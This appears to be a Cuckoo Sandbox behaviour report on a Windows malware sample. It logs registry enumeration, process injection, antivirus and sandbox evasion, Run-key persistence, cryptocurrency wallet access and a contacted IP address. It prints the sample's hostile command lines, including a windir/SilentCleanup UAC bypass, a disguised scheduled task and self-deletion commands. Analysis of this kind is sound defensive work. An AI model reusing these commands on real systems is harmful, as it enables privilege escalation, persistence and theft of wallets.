RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d} base_handle: 0x80000002 key_handle: 0x000005c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}	1	0
RegOpenKeyExW Aug. 9, 2021, 9:27 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall		2
RegOpenKeyExA Aug. 9, 2021, 9:26 a.m.	regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall base_handle: 0x80000002 key_handle: 0x00000344 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1	0
RegOpenKeyExA Aug. 9, 2021, 9:26 a.m.	regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\AddressBook base_handle: 0x80000002 key_handle: 0x00000348 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1	0
RegOpenKeyExA Aug. 9, 2021, 9:26 a.m.	regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\Connection Manager base_handle: 0x80000002 key_handle: 0x00000348 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1	0
RegOpenKeyExA Aug. 9, 2021, 9:26 a.m.	regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\DirectDrawEx base_handle: 0x80000002 key_handle: 0x00000348 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1	0
RegOpenKeyExA Aug. 9, 2021, 9:26 a.m.	regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\EditPlus base_handle: 0x80000002 key_handle: 0x00000348 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1	0
RegOpenKeyExA Aug. 9, 2021, 9:26 a.m.	regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\ENTERPRISE base_handle: 0x80000002 key_handle: 0x00000348 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1	0
RegOpenKeyExA Aug. 9, 2021, 9:26 a.m.	regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\Fontcore base_handle: 0x80000002 key_handle: 0x00000348 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1	0
RegOpenKeyExA Aug. 9, 2021, 9:26 a.m.	regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\Google Chrome base_handle: 0x80000002 key_handle: 0x00000348 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1	0
RegOpenKeyExA Aug. 9, 2021, 9:26 a.m.	regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x00000348 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1	0
RegOpenKeyExA Aug. 9, 2021, 9:26 a.m.	regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\IE40 base_handle: 0x80000002 key_handle: 0x00000348 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1	0

Terminates another process (8 events)

Time & API	Arguments	Status
NtTerminateProcess Aug. 9, 2021, 9:41 a.m.	status_code: 0xffffffff process_identifier: 3788 process_handle: 0x000003a4
NtTerminateProcess Aug. 9, 2021, 9:41 a.m.	status_code: 0xffffffff process_identifier: 3788 process_handle: 0x000003a4	1
NtTerminateProcess Aug. 9, 2021, 9:41 a.m.	status_code: 0xffffffff process_identifier: 3824 process_handle: 0x000003e4
NtTerminateProcess Aug. 9, 2021, 9:41 a.m.	status_code: 0xffffffff process_identifier: 3824 process_handle: 0x000003e4	1
NtTerminateProcess Aug. 9, 2021, 9:41 a.m.	status_code: 0xffffffff process_identifier: 3860 process_handle: 0x000003e8
NtTerminateProcess Aug. 9, 2021, 9:41 a.m.	status_code: 0xffffffff process_identifier: 3860 process_handle: 0x000003e8	1
NtTerminateProcess Aug. 9, 2021, 9:41 a.m.	status_code: 0xffffffff process_identifier: 3896 process_handle: 0x000003f0
NtTerminateProcess Aug. 9, 2021, 9:41 a.m.	status_code: 0xffffffff process_identifier: 3896 process_handle: 0x000003f0	1

Uses Windows utilities for basic Windows functionality (11 events)

cmdline	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dCtjCu" /XML "C:\Users\test22\AppData\Local\Temp\tmp671A.tmp"
cmdline	reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
cmdline	taskkill /pid 2364
cmdline	/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
cmdline	reg delete hkcu\Environment /v windir /f
cmdline	schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
cmdline	C:\Program Files (x86)\internet explorer\ieinstal.exe
cmdline	cmd.exe /c taskkill /pid 2364 & erase C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\499642249564258\\* & exit
cmdline	cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\zxcv.EXE"
cmdline	schtasks.exe /Create /TN "Updates\dCtjCu" /XML "C:\Users\test22\AppData\Local\Temp\tmp671A.tmp"
cmdline	"C:\Windows\System32\cmd.exe" /c taskkill /pid 2364 & erase C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\499642249564258\\* & exit

One or more of the buffers contains an embedded PE file (4 events)

buffer	Buffer with sha1: 1818c3e3f0d19dfc6952e972a84c413cff99a49f
buffer	Buffer with sha1: 9361d715ff040cd9484c4f1833740ecf24aa1952
buffer	Buffer with sha1: 70a3786d029f71f21fc52036b923eba7d537de76
buffer	Buffer with sha1: 45e2b2ebb2cc5180aef95db262be680c13ce1f75

Communicates with host for which no DNS query was performed (1 event)

host

74.119.195.134

Allocates execute permission to another process indicative of possible code injection (19 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 3788 region_size: 73728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000039c		3221225496
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 3824 region_size: 73728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000394		3221225496
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 3860 region_size: 73728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003dc		3221225496
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 3896 region_size: 73728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003d0		3221225496
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 3932 region_size: 73728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003ec	1	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 1048 region_size: 471040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10580000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000518	1	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x00000518	1	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000518	1	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000518	1	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00170000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000518	1	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00180000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000518	1	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00230000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000518	1	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00240000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000518	1	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00250000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000518	1	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000518	1	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000518	1	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 1048 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00280000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000518	1	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 4024 region_size: 49152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002b4	1	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 3180 region_size: 32768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002bc	1	0

Attempts to identify installed AV products by installation directory (14 events)

file	C:\ProgramData\Microsoft\Microsoft Antimalware\Network Inspection System\Support
file	C:\ProgramData\Microsoft\Microsoft Antimalware\Network Inspection System\Support\NisLog.txt
file	C:\ProgramData\Microsoft\Microsoft Antimalware
file	C:\ProgramData\Microsoft\Microsoft Antimalware\Network Inspection System
file	C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe
file	C:\ProgramData\Microsoft\Microsoft Security Client\Support\EppSetup.etl
file	C:\ProgramData\Microsoft\Microsoft Security Client\Support\EppSetupResult.ini
file	C:\ProgramData\Microsoft\Microsoft Security Client\Support\MSSecurityClient_Setup_4.10.209.0_epp_Install.log
file	C:\ProgramData\Microsoft\Microsoft Security Client
file	C:\ProgramData\Microsoft\Microsoft Security Client\Support\Application.etl
file	C:\ProgramData\Microsoft\Microsoft Security Client\Support\EppSetup.log
file	C:\ProgramData\Microsoft\Microsoft Security Client\Support\MSSecurityClient_Setup_4.10.209.0_epp_Uninstall.log
file	C:\ProgramData\Microsoft\Microsoft Security Client\Support
file	C:\ProgramData\Microsoft\Microsoft Security Client\Support\EppOobe.etl

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Installs itself for autorun at Windows startup (2 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Jjdsdpr				reg_value	C:\Users\Public\Libraries\rpdsdjJ.url
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Bdojytw				reg_value	C:\Users\Public\Libraries\wtyjodB.url

Attempts to access Bitcoin/ALTCoin wallets (19 events)

file	C:\Users\test22\AppData\Roaming\Bitcoin\
file	C:\Users\test22\AppData\Roaming\Electrum\wallets\
file	C:\Users\test22\AppData\Roaming\Litecoin\
file	C:\Users\test22\AppData\Roaming\Namecoin\
file	C:\Users\test22\AppData\Roaming\Terracoin\
file	C:\Users\test22\AppData\Roaming\Primecoin\
file	C:\Users\test22\AppData\Roaming\Freicoin\
file	C:\Users\test22\AppData\Roaming\devcoin\
file	C:\Users\test22\AppData\Roaming\Franko\
file	C:\Users\test22\AppData\Roaming\Megacoin\
file	C:\Users\test22\AppData\Roaming\Infinitecoin\
file	C:\Users\test22\AppData\Roaming\Ixcoin\
file	C:\Users\test22\AppData\Roaming\Anoncoin\
file	C:\Users\test22\AppData\Roaming\BBQCoin\
file	C:\Users\test22\AppData\Roaming\digitalcoin\
file	C:\Users\test22\AppData\Roaming\Mincoin\
file	C:\Users\test22\AppData\Roaming\GoldCoin (GLD)\
file	C:\Users\test22\AppData\Roaming\YACoin\
file	C:\Users\test22\AppData\Roaming\Florincoin\

Attempts to detect Cuckoo Sandbox through the presence of a file (2 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\agent.py
file	C:\Python27\agent.pyw

